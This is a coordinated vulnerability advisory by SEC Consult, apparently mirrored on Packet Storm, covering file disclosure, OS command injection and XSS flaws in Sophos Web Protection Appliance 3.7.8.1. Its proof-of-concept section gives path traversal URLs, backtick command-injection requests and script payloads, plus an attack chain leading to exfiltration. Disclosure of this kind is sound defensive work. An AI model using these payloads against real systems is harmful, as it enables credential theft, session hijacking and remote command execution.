what you don't know can hurt you

Sophos Web Protection Appliance 3.7.8.1 XSS / Command Execution

Sophos Web Protection Appliance 3.7.8.1 XSS / Command Execution
Posted Apr 3, 2013
Authored by Wolfgang Ettlinger | Site sec-consult.com

Sophos Web Protection Appliance version 3.7.8.1 suffers from OS command injection, cross site scripting, and file disclosure vulnerabilities.

tags | exploit, web, vulnerability, xss
advisories | CVE-2013-2641, CVE-2013-2642, CVE-2013-2643
MD5 | 01c4c0a97f30967135856c6d7e09d3fd

Sophos Web Protection Appliance 3.7.8.1 XSS / Command Execution

Change Mirror Download
SEC Consult Vulnerability Lab Security Advisory < 20130403-0 >
=======================================================================
title: Multiple vulnerabilities
product: Sophos Web Protection Appliance
vulnerable version: <= 3.7.8.1
fixed version: 3.7.8.2
impact: Critical
CVE number: CVE-2013-2641, CVE-2013-2642, CVE-2013-2643
homepage: http://www.sophos.com/
found: 2013-01-14
by: Wolfgang Ettlinger
SEC Consult Vulnerability Lab
https://www.sec-consult.com

=======================================================================

Vendor/product description:
-----------------------------
"Our award-winning Secure Web Gateway appliances make web protection easy.
They are quick to setup, simple to manage and make policy administration a
snap, even for non-technical users."

URL: http://www.sophos.com/en-us/products/web/web-protection.aspx


Business recommendation:
------------------------
SEC Consult has identified several vulnerabilities within the components of
the Sophos Web Protection Appliance in the course of a short crash test. Some
components have been spot-checked, while others have not been tested at all.

An attacker can get unauthorized access to the appliance and plant backdoors or
access configuration files containing credentials for other systems (eg. Active
Directory/FTP login) which can be used in further attacks.
Since all web traffic passes through the appliance, interception of HTTP as
well as the plaintext form of HTTPS traffic (if HTTPS Scanning feature in use),
including sensitive information like passwords and session Cookies is possible.
If HTTPS Scanning is enabled, the appliance holds a private key for a
Certificate Authority (CA) certificate that is installed/trusted on all
workstations in the company. If this private key is compromised by an attacker,
arbitrary certificates can be signed. These certificates will then pass
validation on the client machines, enabling in various attacks targeting
clients (MITM, phishing, evilgrade, ...).

The recommendation of SEC Consult is to switch off the product until a
comprehensive security audit based on a security source code review has been
performed and all identified security deficiencies have been resolved by the
vendor.

Vulnerability overview/description:
-----------------------------------
1) Unauthenticated local file disclosure (CVE-2013-2641)
Unauthenticated users can read arbitrary files from the filesystem with the
privileges of the "spiderman" operating system user. These files include
configuration files containing sensitive information such as clear text
passwords which can be used in other attacks.
Furthermore the webserver log file which holds valid PHP session IDs can be
accessed. With this information administrator users can be impersonated.

2) OS command injection (CVE-2013-2642)
Authenticated users can execute arbitrary commands on the underlying
operating system with the privileges of the "spiderman" operating system user.
This can be used to get persistent access to the affected system (eg. by
planting backdoors), accessing all kinds locally stored information or
intercepting web traffic that passes through the appliance.
Unauthenticated users can exploit this kind of vulnerability too (depends on
appliance configuration).

3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643)
Reflected Cross Site Scripting vulnerabilities were found. An attacker can use
these vulnerabilities the exploit other vulnerabilities in the web interface
or conducting phishing attacks.


Proof of concept:
-----------------
1) Unauthenticated local file disclosure (CVE-2013-2641)
As an example, an unauthenticated user can download the configuration file
containing the salted hash of the administrator password as well as clear text
passwords e.g. for FTP backup storage or Active Directory authentication:

https://<host>/cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00

Furthermore the Apache access log can be retrieved. As PHP session IDs are
passed via the URL rather than via Cookies, these can be found in this log
file and effectively used to impersonate administrator users:

https://<host>/cgi-bin/patience.cgi?id=../../log/ui_access_log%00

An excerpt from the log file shows that it contains PHP session ID information
(parameter "STYLE").
<host> - - [21/Feb/2013:17:02:17 +0000] "POST /index.php?c=dashboard HTTP/1.1" 200 139
"https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153"
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"


2) OS command injection (CVE-2013-2642)
The "Diagnostic Tools" functionality allows an authenticated user to inject
arbitrary operating system commands enclosed in backticks (`). These commands
are run with the privileges of the operating system user "spiderman":

POST /index.php?c=diagnostic_tools HTTP/1.1
Host: <host>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 92
Cache-Control: no-cache

action=wget&section=configuration&STYLE=<valid session id>&url=%60sleep%205%60


The "Local Site List" functionality allows injection of arbitrary OS commands:

POST /index.php?c=local_site_list_editor HTTP/1.1
Host: <host>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 205

STYLE=<valid session
id>&action=save&entries=[{"url"%3a+".'`sleep+10`'",+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}]

Note: Unauthenticated users can retrieve valid session IDs using the
vulnerability in 1).

If a customized template for the "Block page" uses the variable
"%%user_workstation%%", an _unauthenticated_ user can inject OS commands using the
following URL:

https://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60


3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643)
The following URLs demonstrate reflected Cross Site Scripting vulnerabilities:

https://<host>/rss.php?action=allow&xss=%3Cscript%3Ealert%28String.fromCharCode%28120,%20115,%20115%29%29%3C/script%3E
https://<host>/end-user/errdoc.php?e=530&msg=PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ%2bCg%3d%3d
https://<host>/end-user/ftp_redirect.php?r=x&h=%3C/script%3E%3Cscript%3Ealert%281%29%3b%3C/script%3E
https://<host>/index.php?c=blocked&reason=malware&user=&&threat=%3Cscript%3Ealert%281%29%3C/script%3E

As the application uses URL parameters to transmit session IDs and rather
than cookies, session stealing attacks cannot be executed using these flaws.
However, these vulnerabilities can still be used to fake login pages for
phishing purposes.
Furthermore the vulnerabilities in 1) and 2) can be exploited via one of the
XSS vulnerabilities. This enables attacks on the appliance even when the
web interface would otherwise not be reachable to the attacker.

Possible attack scenario:
Use XSS to run malicous Javascript in the browser of a user who has network
access to the web interface. This code can:
- Exploit the local file disclosure vulnerability (see 1) in order to gain
access to valid session IDs and impersonate administrator users.
- Exploit the OS command injection (see 2) in order to execute arbitrary
commands on the system.
- Exfiltrate sensitive information like HTTP, (plaintext) HTTPS traffic or the
private key for the CA certificate used for HTTPS scanning (MITM).


Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in the Sophos Web Protection
Appliance version 3.7.8.1, which was the most recent version at the time of
discovery.


Vendor contact timeline:
------------------------
2013-02-22: Sending advisory and proof of concept exploit via encrypted
channel.
2013-02-23: Vendor acknowledges receipt of advisory.
2013-03-01: Vendor confirms reported issues and provides preliminary
information about release dates.
2013-03-07: Conference call: Addressing the risks the discovered
vulnerabilities pose to customers and release schedule.
2013-03-18: Vendor starts rollout of update to "a first group of customers".
2013-04-03: SEC Consult releases coordinated security advisory.


Solution:
---------
Update to Web Protection Appliance version 3.7.8.2.

More information can be found at:
http://www.sophos.com/en-us/support/knowledgebase/118969.aspx


Workaround:
-----------
No workaround available.


Advisory URL:
--------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
https://www.sec-consult.com
http://blog.sec-consult.com


EOF Wolfgang Ettlinger, Stefan Viehböck / @2013

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    60 Files
  • 2
    Apr 2nd
    20 Files
  • 3
    Apr 3rd
    10 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    0 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    0 Files
  • 9
    Apr 9th
    0 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close